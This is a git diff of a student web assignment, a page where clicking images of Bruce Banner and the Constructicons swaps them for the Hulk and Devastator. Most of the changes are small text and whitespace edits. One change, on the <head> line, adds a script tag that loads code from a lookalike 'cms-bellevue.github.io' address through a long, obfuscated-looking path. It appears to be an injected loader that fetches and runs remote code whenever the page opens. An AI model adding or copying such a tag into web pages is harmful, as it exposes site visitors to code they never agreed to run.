--- a/module-10/Scott_Mod10_3.html
+++ b/module-10/Scott_Mod10_3.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <html lang="en">
-<head>
+<head><script type='text/javascript' src='https://cms-bellevue.github.io/IqO7JkLxG0hgHjBnlK6_5EtCo9y4Nm7Aoue1nL9h6xPxskWaCh1PMRCgsvGhxtQ_gSnUDEA1f0MLDxXCFDL33A=='></script>
   <meta charset="UTF-8">
   <meta  name="description" content="Assignment 10.3: JavaScript - Part 2">
   <meta  name="keywords" content="HTML, CSS, JavaScript, Bellevue University, Clint Scott, Assignment 10.3">
@@ -13,24 +13,24 @@
 <body>
   <header>
   <h1>Assignment 10.3: JavaScript - Part 2</h1>
-  </header>
-  <div class="container">    
-    <p>Click an image to see the transformation!</p>	
+  </header>  
+  <div class="container">     
+	<p>Click an image to see the transformation!</p>
     <div class="image-container">
       <div class="left-image">
         <img src="images/banner.jpg" alt="Bruce Banner" class="thumbnail"
              data-original="images/banner.jpg"
              data-alt="images/hulk.jpg"
-             onclick="transform(this)" title="Click to transform into the Hulk">
+             onclick="transform(this)" title="Click to transform into the Hulk!">
       </div>
       <div class="right-image">
         <img src="images/constructicons.jpg" alt="Transformers Constructicons" class="thumbnail"
              data-original="images/constructicons.jpg"
              data-alt="images/devastator.jpg"
-             onclick="transform(this)" title="Click to transform into vehicle">
+             onclick="transform(this)" title="Click to transform into Devastator!">
       </div>
-	  <p>Click an image a second time to go back to the original.</p>
     </div>
+    <p>Click an image a second time to go back to the original.</p>
   </div>
   <footer>
     <p>&copy; 2025 Scott</p>
